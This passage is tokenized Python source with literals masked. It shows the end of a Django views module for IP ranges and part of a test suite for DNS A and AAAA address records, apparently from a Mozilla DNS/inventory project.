'<STR_LIT:start>' : start , <EOL> '<STR_LIT:end>' : end , <EOL> '<STR_LIT>' : int_to_ip ( start , start_ip_type ) , <EOL> '<STR_LIT>' : int_to_ip ( end , end_ip_type ) , <EOL> '<STR_LIT>' : rusage , <EOL> '<STR_LIT>' : translate_ip <EOL> } ) <EOL> def range_detail ( request , range_pk ) : <EOL> mrange = get_object_or_404 ( Range , pk = range_pk ) <EOL> attrs = mrange . keyvalue_set . 
all ( ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : mrange , <EOL> '<STR_LIT>' : attrs , <EOL> } ) <EOL> def redirect_to_range_from_ip ( request ) : <EOL> ip_str = request . GET . get ( '<STR_LIT>' ) <EOL> ip_type = request . GET . get ( '<STR_LIT>' ) <EOL> if not ( ip_str and ip_type ) : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : "<STR_LIT>" } ) ) <EOL> if ip_type == '<STR_LIT:4>' : <EOL> try : <EOL> ip_upper , ip_lower = <NUM_LIT:0> , int ( ipaddr . IPv4Address ( ip_str ) ) <EOL> except ipaddr . AddressValueError : <EOL> return HttpResponse ( <EOL> json . dumps ( { '<STR_LIT:success>' : False , '<STR_LIT:message>' : "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( ip_str ) } ) ) <EOL> else : <EOL> try : <EOL> ip_upper , ip_lower = ipv6_to_longs ( ip_str ) <EOL> except ValidationError : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT:success>' : False , <EOL> '<STR_LIT:message>' : '<STR_LIT>' } ) ) <EOL> range_ = Range . objects . filter ( start_upper__lte = ip_upper , <EOL> start_lower__lte = ip_lower , <EOL> end_upper__gte = ip_upper , <EOL> end_lower__gte = ip_lower ) <EOL> if not len ( range_ ) == <NUM_LIT:1> : <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT>' : "<STR_LIT>" } ) ) <EOL> else : <EOL> return HttpResponse ( json . dumps ( <EOL> { '<STR_LIT:success>' : True , <EOL> '<STR_LIT>' : range_ [ <NUM_LIT:0> ] . get_absolute_url ( ) } ) ) <EOL> def get_next_available_ip_by_range ( request , range_id ) : <EOL> range = get_object_or_404 ( Range , id = range_id ) <EOL> ret = { } <EOL> ret_ip = range . get_next_ip ( ) <EOL> display_ip = ret_ip . exploded <EOL> ret [ '<STR_LIT:success>' ] = True <EOL> ret [ '<STR_LIT>' ] = display_ip <EOL> return HttpResponse ( json . dumps ( ret ) ) <EOL> def get_all_ranges_ajax ( request ) : <EOL> system_pk = request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> location = None <EOL> system = None <EOL> ret_list = [ ] <EOL> from systems . 
models import System <EOL> try : <EOL> system = System . objects . get ( pk = system_pk ) <EOL> except ObjectDoesNotExist : <EOL> pass <EOL> if system : <EOL> try : <EOL> location = system . system_rack . location . name . title ( ) <EOL> except AttributeError : <EOL> pass <EOL> for r in Range . objects . all ( ) . order_by ( '<STR_LIT>' ) : <EOL> relevant = False <EOL> if r . network . site : <EOL> site_name = r . network . site . get_site_path ( ) <EOL> if location and location == r . network . site . name . title ( ) : <EOL> relevant = True <EOL> else : <EOL> site_name = '<STR_LIT>' <EOL> if r . network . vlan : <EOL> vlan_name = r . network . vlan . name <EOL> else : <EOL> vlan_name = '<STR_LIT>' <EOL> ret_list . append ( { '<STR_LIT:id>' : r . pk , <EOL> '<STR_LIT>' : r . choice_display ( ) , <EOL> '<STR_LIT>' : vlan_name , <EOL> '<STR_LIT>' : site_name , <EOL> '<STR_LIT>' : relevant <EOL> } ) <EOL> return HttpResponse ( json . dumps ( ret_list ) ) </s>
<s> import ipaddr <EOL> from django . core . exceptions import ValidationError <EOL> from django . db import IntegrityError <EOL> from django . test import TestCase <EOL> from mozdns . address_record . models import AddressRecord <EOL> from mozdns . domain . models import Domain <EOL> from mozdns . ip . models import ipv6_to_longs <EOL> from mozdns . nameserver . models import Nameserver <EOL> from mozdns . domain . models import boot_strap_ipv6_reverse_domain <EOL> from mozdns . ip . utils import ip_to_domain_name <EOL> from mozdns . cname . models import CNAME <EOL> class AddressRecordTests ( TestCase ) : <EOL> def create_domain ( self , name , ip_type = None , delegated = False ) : <EOL> if ip_type is None : <EOL> ip_type = '<STR_LIT:4>' <EOL> if name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> pass <EOL> else : <EOL> name = ip_to_domain_name ( name , ip_type = ip_type ) <EOL> d = Domain ( name = name , delegated = delegated ) <EOL> d . clean ( ) <EOL> self . assertTrue ( d . is_reverse ) <EOL> return d <EOL> def setUp ( self ) : <EOL> self . arpa = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . arpa . save ( ) <EOL> self . i_arpa = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . i_arpa . save ( ) <EOL> self . i6_arpa = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . i6_arpa . save ( ) <EOL> self . osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> try : <EOL> self . e = Domain ( name = '<STR_LIT>' ) <EOL> self . e . save ( ) <EOL> except IntegrityError : <EOL> pass <EOL> try : <EOL> self . o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . o_e . save ( ) <EOL> except IntegrityError : <EOL> self . o_e = Domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . f_o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . f_o_e . save ( ) <EOL> except IntegrityError : <EOL> self . f_o_e = Domain . objects . 
filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . m_o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . m_o_e . save ( ) <EOL> except IntegrityError : <EOL> self . m_o_e = Domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . z_o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . z_o_e . save ( ) <EOL> except IntegrityError : <EOL> self . z_o_e = Domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . g_o_e = Domain ( name = '<STR_LIT>' ) <EOL> self . g_o_e . save ( ) <EOL> except IntegrityError : <EOL> self . g_o_e = Domain . objects . filter ( <EOL> name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . _128 = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . _128 . save ( ) <EOL> except IntegrityError : <EOL> raise Exception <EOL> self . _128 = self . create_domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> try : <EOL> self . _128_193 = self . create_domain ( name = '<STR_LIT>' ) <EOL> self . _128_193 . save ( ) <EOL> except IntegrityError : <EOL> raise Exception <EOL> self . _128_193 = Domain . objects . filter ( name = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> pass <EOL> def test_invalid_update_to_existing ( self ) : <EOL> rec1 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec2 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec3 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . z_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec3 . save ( ) <EOL> rec2 . save ( ) <EOL> rec1 . save ( ) <EOL> rec1 . label = "<STR_LIT:foo>" <EOL> self . assertRaises ( ValidationError , rec1 . save ) <EOL> rec3 . label = "<STR_LIT:bar>" <EOL> self . assertRaises ( ValidationError , rec3 . 
save ) <EOL> osu_block = "<STR_LIT>" <EOL> rec1 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec2 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec3 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec1 . save ( ) <EOL> rec2 . save ( ) <EOL> rec3 . save ( ) <EOL> rec2 . ip_str = osu_block + "<STR_LIT>" <EOL> self . assertRaises ( ValidationError , rec2 . save ) <EOL> rec3 . label = '<STR_LIT:bar>' <EOL> self . assertRaises ( ValidationError , rec3 . save ) <EOL> """<STR_LIT>""" <EOL> def _do_generic_update_test ( self , record , new_name , new_ip , ip_type ) : <EOL> if new_ip : <EOL> if ip_type == '<STR_LIT:4>' : <EOL> ip_upper , ip_lower = <NUM_LIT:0> , ipaddr . IPv4Address ( new_ip ) . __int__ ( ) <EOL> else : <EOL> ip_upper , ip_lower = ipv6_to_longs ( new_ip ) <EOL> else : <EOL> ip_upper , ip_lower = record . ip_upper , record . ip_lower <EOL> if new_name is not None and new_ip is not None : <EOL> aret = AddressRecord . objects . filter ( <EOL> label = new_name , ip_upper = ip_upper , <EOL> ip_lower = ip_lower , ip_type = ip_type ) [ <NUM_LIT:0> ] <EOL> elif new_name is not None : <EOL> aret = AddressRecord . objects . filter ( <EOL> label = new_name , ip_upper = ip_upper , <EOL> ip_lower = ip_lower , ip_type = ip_type ) [ <NUM_LIT:0> ] <EOL> else : <EOL> aret = AddressRecord . objects . filter ( <EOL> label = new_name , ip_upper = ip_upper , <EOL> ip_lower = ip_lower , ip_type = ip_type ) [ <NUM_LIT:0> ] <EOL> if new_name : <EOL> self . assertEqual ( aret . label , new_name ) <EOL> if new_ip : <EOL> if ip_type == '<STR_LIT:4>' : <EOL> self . assertEqual ( <EOL> aret . ip_str , ipaddr . IPv4Address ( new_ip ) . __str__ ( ) ) <EOL> else : <EOL> self . assertEqual ( <EOL> aret . 
ip_str , ipaddr . IPv6Address ( new_ip ) . __str__ ( ) ) <EOL> def do_update_A_record ( self , record , new_name , new_ip ) : <EOL> if new_name is not None : <EOL> record . label = new_name <EOL> if new_ip is not None : <EOL> record . ip_str = new_ip <EOL> record . save ( ) <EOL> self . _do_generic_update_test ( record , new_name , new_ip , '<STR_LIT:4>' ) <EOL> def do_update_AAAA_record ( self , record , new_name , new_ip ) : <EOL> if new_name is not None : <EOL> record . label = new_name <EOL> if new_ip is not None : <EOL> record . ip_str = new_ip <EOL> record . save ( ) <EOL> self . _do_generic_update_test ( record , new_name , new_ip , '<STR_LIT>' ) <EOL> def test_update_A_record ( self ) : <EOL> rec0 = AddressRecord ( label = '<STR_LIT>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec0 . save ( ) <EOL> rec1 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec1 . save ( ) <EOL> rec2 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec2 . save ( ) <EOL> rec3 = AddressRecord ( label = '<STR_LIT>' <EOL> '<STR_LIT>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec3 . save ( ) <EOL> self . do_update_A_record ( rec0 , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec1 , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec2 , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec3 , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec0 , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec1 , "<STR_LIT:w>" , "<STR_LIT>" ) <EOL> self . do_update_A_record ( rec0 , '<STR_LIT>' , "<STR_LIT>" ) <EOL> self . 
do_update_A_record ( rec1 , "<STR_LIT>" , None ) <EOL> def test_update_AAAA_record ( self ) : <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> osu_block = "<STR_LIT>" <EOL> rec0 = AddressRecord ( label = '<STR_LIT>' , domain = self . z_o_e , ip_str = osu_block + <EOL> "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec1 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> rec2 = AddressRecord ( label = '<STR_LIT:bar>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> self . do_update_AAAA_record ( rec0 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec2 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec0 , "<STR_LIT>" , osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec0 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec2 , "<STR_LIT>" , <EOL> osu_block + "<STR_LIT::>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , osu_block + "<STR_LIT>" ) <EOL> self . do_update_AAAA_record ( rec1 , "<STR_LIT>" , osu_block + "<STR_LIT>" ) <EOL> def test_update_invalid_ip_A_record ( self ) : <EOL> rec0 = AddressRecord ( label = '<STR_LIT>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec1 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . m_o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec1 , '<STR_LIT>' : "<STR_LIT:.>" , "<STR_LIT>" : None } ) <EOL> self . 
assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : None } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , "<STR_LIT>" : <EOL> None } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , ** { <EOL> '<STR_LIT>' : rec0 , '<STR_LIT>' : None , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , "<STR_LIT>" : <EOL> "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , "<STR_LIT>" : <EOL> <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , "<STR_LIT>" : <EOL> <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . do_update_A_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , "<STR_LIT>" : <EOL> "<STR_LIT>" } ) <EOL> def test_update_invalid_ip_AAAA_record ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> rec0 = AddressRecord ( label = '<STR_LIT:foo>' , domain = self . z_o_e , <EOL> ip_str = osu_block + "<STR_LIT>" , ip_type = '<STR_LIT>' ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , ** { <EOL> '<STR_LIT>' : rec0 , '<STR_LIT>' : None , '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : osu_block + "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . 
do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : osu_block } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : osu_block + "<STR_LIT>" } ) <EOL> self . assertRaises ( ValidationError , self . do_update_AAAA_record , <EOL> ** { '<STR_LIT>' : rec0 , '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : None } ) <EOL> def do_remove_A_record ( self , aname , domain , ip ) : <EOL> aret = AddressRecord ( <EOL> label = aname , domain = domain , ip_str = ip , ip_type = '<STR_LIT:4>' ) <EOL> aret . save ( ) <EOL> self . assertTrue ( aret ) <EOL> aret . delete ( ) <EOL> aret = AddressRecord . objects . filter ( <EOL> label = aname , domain = domain , ip_str = ip ) <EOL> self . assertFalse ( aret ) <EOL> def do_remove_AAAA_record ( self , aname , domain , ip ) : <EOL> aret = AddressRecord ( <EOL> label = aname , domain = domain , ip_str = ip , ip_type = '<STR_LIT>' ) <EOL> aret . save ( ) <EOL> self . assertTrue ( aret ) <EOL> aret . delete ( ) <EOL> nret = AddressRecord . objects . filter ( <EOL> label = aname , domain = domain , ip_str = ip ) <EOL> self . assertFalse ( nret ) <EOL> def test_remove_A_address_records ( self ) : <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . 
o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT:right>" , self . o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT>" , self . f_o_e , "<STR_LIT>" ) <EOL> self . do_remove_A_record ( "<STR_LIT:right>" , self . f_o_e , "<STR_LIT>" ) <EOL> def test_remove_AAAA_address_records ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . 
do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> self . do_remove_AAAA_record ( "<STR_LIT>" , self . f_o_e , osu_block + "<STR_LIT>" ) <EOL> def do_add_record ( self , data ) : <EOL> rec = AddressRecord ( label = data [ '<STR_LIT:label>' ] , domain = data [ <EOL> '<STR_LIT>' ] , ip_str = data [ '<STR_LIT>' ] , ip_type = '<STR_LIT:4>' ) <EOL> rec . save ( ) <EOL> self . assertTrue ( rec . __repr__ ( ) ) <EOL> self . assertTrue ( rec . get_absolute_url ( ) ) <EOL> self . assertTrue ( rec . get_edit_url ( ) ) <EOL> self . assertTrue ( rec . get_delete_url ( ) ) <EOL> self . assertTrue ( rec . details ( ) ) <EOL> search = AddressRecord . objects . filter ( label = data [ '<STR_LIT:label>' ] , <EOL> domain = data [ '<STR_LIT>' ] , <EOL> ip_type = '<STR_LIT:4>' , ip_str = data [ '<STR_LIT>' ] ) <EOL> found = False <EOL> for record in search : <EOL> if record . ip_str == data [ '<STR_LIT>' ] : <EOL> found = True <EOL> self . assertTrue ( found ) <EOL> return rec <EOL> def do_add_record6 ( self , data ) : <EOL> rec = AddressRecord ( label = data [ '<STR_LIT:label>' ] , domain = data [ <EOL> '<STR_LIT>' ] , ip_str = data [ '<STR_LIT>' ] , ip_type = '<STR_LIT>' ) <EOL> rec . save ( ) <EOL> self . assertTrue ( rec . __repr__ ( ) ) <EOL> self . assertTrue ( rec . get_absolute_url ( ) ) <EOL> self . assertTrue ( rec . get_edit_url ( ) ) <EOL> self . assertTrue ( rec . get_delete_url ( ) ) <EOL> self . assertTrue ( rec . details ( ) ) <EOL> def test_add_A_address_glob_records ( self ) : <EOL> rec = AddressRecord ( label = '<STR_LIT>' , domain = self . o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec . clean ( ) <EOL> rec . save ( ) <EOL> self . 
assertEqual ( rec . __str__ ( ) , "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT:*>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : <EOL> "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> def test_add_address_underscore_in_name_domain ( self ) : <EOL> d = Domain ( name = "<STR_LIT>" ) <EOL> d . save ( ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT:*>' , '<STR_LIT>' : d , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT:foo>' , '<STR_LIT>' : d , '<STR_LIT>' : "<STR_LIT>" } <EOL> a = self . do_add_record ( data ) <EOL> a . save ( ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : d , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> def test_add_A_address_records ( self ) : <EOL> rec = AddressRecord ( label = '<STR_LIT>' , domain = self . o_e , <EOL> ip_str = "<STR_LIT>" , ip_type = '<STR_LIT:4>' ) <EOL> rec . clean ( ) <EOL> rec . save ( ) <EOL> self . assertEqual ( rec . __str__ ( ) , "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : <EOL> "<STR_LIT>" } <EOL> self . 
do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> def test_add_AAAA_address_records ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . 
